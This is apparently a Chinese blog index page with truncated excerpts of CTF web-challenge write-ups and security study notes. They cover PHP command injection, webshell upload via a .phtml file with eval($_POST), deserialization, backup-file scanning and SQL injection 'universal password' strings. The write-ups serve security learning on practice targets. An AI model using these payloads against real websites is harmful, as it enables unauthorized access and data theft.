CTF之Web习题--找回密码/js白盒审计
web15原始信息信息收集类题目,收集到了下面的信息:
1156631961@qq.com0000000 Locations+12586954775demo@gmail.com
解题先瞄一眼扫出来的结果:
[200][text/html; charset=UTF-8][1.07kb] http://e22d0c31-672f-47c0-a393-1a1f77bd2d06.challenge.ctf.show/admin/?/login[200][text/html; charset=UTF-8][1.07kb] http://e22d0c31-672f-47c0-a393-1a1f77bd2d06.challenge.ctf.show/admin/[200][text/html; charset=UTF-8][1.07kb] http://e22d0c31-672f-47c0-a393-1a1f77bd2d06.challenge.ctf.show/admin/index.php[200][text/html][8.31kb] http://e22d0c31-672f-47c0-a3 ...
CTF之Web习题--观察/md5/flask
题源BUUCTF。
[极客大挑战 2019]BuyFlag原始信息两个页面:index.php和buy.php
源码信息和页面信息
<!-- ~~~post money and password~~~if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password == 404) { echo "Password Right!</br>"; }}-->旗帜旗帜需要你1亿的钱注意力如果您想购买 FLAG:你一定是CUIT的学生!!!您必须回答正确的密码!只有 Cuit 的学生可以购买 FLAG
解题参数:password
很明显,是弱类型对比。纯数字是无法通过pass ...
CTF之Web习题--命令执行
以为一些特殊的变故,BUUCTF平台的靶机又又又又崩了,这次讲平台换成了CTFShow。
大部分以白盒审计为主。
CTFSHOW题目之命令执行:web29原始信息if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}
唯一的过滤这里过滤用到的是正则表达式的preg_match过滤,但仅仅过滤一个字符串flag,所以解题的方法很简单:
首先得到列表: ?c=system('ls'); // 返回 index.php flag.php然后返回flag: ?c=system('tac fla*'); // 返回 $flag = 'ctfshow{4f4f8e ...
CTF之Web习题--PHP网站备份/文件包含
[ACTF2020 新生赛]BackupFile原始信息这次官方很抠门,就给了一句话:
Try to find out source file!
使用dirmap快扫扫不出来,改为dirsearche扫描,扫描速度极度缓慢,使用了整整几乎一小时。(后面多了眼看了下字典,发现可能是网站问题,再扫下没三分钟就出来了……)
至于为什么这么久,我还特地翻了下字典,发现这货居然在5500行那里……
保守估计,完整扫完1W多条数据要三个小时左右。
还要个隐藏信息,BackupFile是文件备份的意思。
解题扫站常见网站备份文件的文件后缀
.rar、.zip、.7z、.tar、.gz、.tar.gz、.bz2、.tar.bz2、.sql、.bak、.dat、.txt、.log、.mdb
更多相关后缀点我
网站目录文件扫描器:dirsearch
"""简单的扫描命令如下"""python dirsearch.py -u "http://ab7744e5-9ead-40d2-99bb-90a0c2f7ac98.node4.buuo ...
CTF之Web总结--工具
关于CTF测试的步骤前端收集
1.扫站2.在前端的页面进行观察,观察任何存在漏洞的漏洞点 存在的漏洞点: 模板漏洞{{}} 输入框SQL注入漏洞 表单get传参漏洞 文件上传漏洞3.针对收集的信息进行测试
SQLmap英文版全解释:
Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -u URL, --url=URL ...
CTF之Web习题--PHP反序列化
题目源:BUUCTF的web题
[极客大挑战 2019]PHP原始信息提示信息:因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯不愧是我!!! 提取下,就是:备份网站。基于网站一般是www文件,猜它是www.zip或者www.rar等。访问 http://xxx.xxx.com/www.zip 得到备份文件文件结构如下:class.php flag.php index.js index.php style.css
解题flag文件基本上就省略了,肯定没信息。
读剩下两个php文件看看:
index.php 唯一有用的信息:<?phpinclude 'class.php';$select = $_GET['select'];$res=unserialize(@$select);?>class.php 里面装着一个类include 'flag.php';class Name{ private $username = 'nonono'; privat ...
CTF之Web习题--文件上传&SQL双写绕过
题目源:BUUCTF的web题
[ACTF2020 新生赛]Upload原始信息原始信息其实就一点,文件上传,并且限制上传为图片。上传后的图片会重命名,并且重命名的方式是: 随机字符串+文件后缀
题目的限制:黑名单+生成随机文件名
解题尝试昨天的生僻php文件类型上传文件即可。
# 这是两个重要的数据包信息Content-Disposition: form-data; name="upload_file"; filename="hack_1.phtml"...<script language="php">eval($_POST['x']);</script>
菜刀一把梭连入后台后,看下源码:
<?phperror_reporting(0);//设置上传目录define("UPLOAD_PATH", "./uplo4d");$msg = "Upload Success!";if (isset($_POST[' ...
CTF之Web习题--SQL注入&文件上传&数据包改包头
[极客大挑战 2019]LoveSQL原始信息题目给出的信息很有限,除了网址外,信息如下:
# 这是网页源代码中有价值的一部分<form action="check.php" method="GET"> <p style="font-family:arial;color:white;font-size:20px;text-align:center;">用户名:</p> <div align="center"><input type="text" name="username" style="text-align:center;" class="input" /></div> <p style="font-family:arial;color:white;font-size:20px;text-align:center;&qu ...
SEC-2022版-0049-服务攻防-08-框架安全&CVE复现&Spring&Struts&Laravel&ThinkPHP
总览框架安全受到的是框架开发者的影响,基本上框架安全是由开发者设定的,不是使用者设定的。框架爆漏洞网站就跟着爆。
知识点:中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery等
1、开发框架-PHP-Laravel-Thinkphp2、开发框架-Javaweb-St2-Spring3、开发框架-Python-django-Flask4、开发框架-Javascript-Node.js-JQuery
常见语言开发框架:PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等JAVA:Spring MyBatis Hibernate Struts2 Springboot等Python:Django Flask Bottle Turbobars Tornado Web2py等Javascript:V ...
SQL注入
SEC知识点学习,非网课
编辑日期
编辑内容
2023-07-24
万能密码
2023-07-26
常规注入流程,部分报错注入
万能密码(摘录删改)源头博客
万能密码通常是指开发人员在开发过程中使用超级管理员进行开发,开发完成后 没有过滤掉 这些 常用的超级管理员 ;另一种是存在 SQL漏洞管理员账号 。
下面分别进行讨论:
(常规型账号密码)1.万能密码: 用户名 密码 admin admin admin 123456 admin password ... ... 类似的还有很多,可以摘个常用账户字典查查。(非常规型账号密码)下面的都是依赖SQL语句中存在的漏洞进行的万能密码登录这些漏洞都是可修复的2.万能密码: 用户名 密码 'or'='or' 'or'='or' 原理解释: 假设用户登录对应的语句为: select name, pwd from login ...













